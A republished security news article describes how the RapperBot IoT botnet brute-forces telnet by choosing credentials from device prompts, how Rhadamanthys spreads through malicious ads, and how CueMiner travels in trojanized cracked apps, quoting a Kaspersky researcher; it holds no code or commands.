New Mirai Variant Employs Uncommon Tactics to Distribute Malware

RapperBots initial infection tactic is one example of the different methods attackers are using to distribute malware.

A new version of a Mirai variant called RapperBot is the latest example of malware using relatively uncommon or previously unknown infection vectors to try and spread widely.
RapperBot first surfaced last year as Internet of Things (IoT) malware containing large chunks of Mirai source code but with some substantially different functionality compared with other Mirai variants. The differences included the use of a new protocol for command-and-control (C2) communications and a built-in feature for brute-forcing SSH servers rather than Telnet services, as is common in Mirai variants.
Researchers from Fortinet tracking the malware last year observed its authors regularly altering the malware, first by
adding code to maintain persistence
on infected machines even after a reboot, and then with code for self-propagation via a remote binary downloader. Later, the malware authors removed the self-propagation feature and added one that allowed them persistent remote access to brute-forced SSH servers.
In the fourth quarter of 2022, Kasperskys researchers
discovered a new RapperBot variant
circulating in the wild, where the SSH brute-force functionality had been removed and replaced with capabilities for targeting telnet servers.
Kasperskys analysis of the malware showed it also integrated what the security vendor described as an intelligent and somewhat uncommon feature for brute-forcing telnet. Rather than brute-forcing with a huge set of credentials, the malware checks the prompts received when it telnets to a device — and based on that, selects the appropriate set of credentials for a brute-force attack. That significantly speeds up the brute-forcing process compared with many other malware tools, Kaspersky said.
When you telnet to a device, you typically get a prompt, says Jornt van der Wiel, a senior security researcher at Kaspersky. The prompt can reveal some information that RapperBot uses to determine the device its targeting and which credentials to use, he says.
Depending on the IoT device that is targeted, RapperBot uses different credentials, he says. So, for device A, it uses user/password set A; and for device B, it uses user/password set B, van der Wiel says.
The malware then uses a variety of possible commands, such as wget, curl, and ftpget to download itself on the target system. If these methods dont work, the malware uses a downloader and installs itself on the device, according Kaspersky.
RapperBots brute-force process is relatively uncommon, and van der Weil says he cant name other malware samples that use the approach.
Even so, given the sheer number of malware samples in the wild, its impossible to say if it is the only malware currently using this approach. Its likely not the first piece of malicious code to use the technique, he says.
Kaspersky pointed to RapperBot as one example of malware employing rare and sometimes previously unseen techniques to spread.
Another example is Rhadamanthys, an information stealer available under a malware-as-a-service option on a Russian language cybercriminal forum. The info stealer is one among a growing number of malware families that threat actors have begun distributing via malicious advertisements.
The tactic involves adversaries planting malware-laden advertisements or ads with links to phishing sites on online ad platforms. Often the ads are for legitimate software products and applications and contain keywords that ensure they surface high on search engine results or when users browse certain websites. In recent months, threat actors have used such so-called malvertisements to
target users of widely used password managers
such as LastPass, Bitwarden, and 1Password.
The growing success that threat actors have had with malvertising scams is spurring an increase in the use of the technique. The authors of Rhadamanthys, for instance, initially used phishing and spam emails before switching to malicious advertisements as the initial infector vector.
Rhadamanthys doesn’t do anything different from other campaigns using malvertising, van der Weil says. It is, however, part of a trend that we see malvertising is becoming more popular.
Another trend Kaspersky has spotted: the growing use of open source malware among less-skilled cybercriminals.
Take CueMiner, a downloader for coin-mining malware available on GitHub. Kasperskys researchers have observed attackers distributing the malware using Trojanized versions of cracked apps downloaded via BitTorrent or from OneDrive sharing networks.
Due to its open source nature, everybody can download and compile it, van der Weil explains. As these users are typically not very advanced cybercriminals, they have to rely on relatively simple infection mechanisms, such as BitTorrent and OneDrive.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
New Mirai Variant Employs Uncommon Tactics to Distribute Malware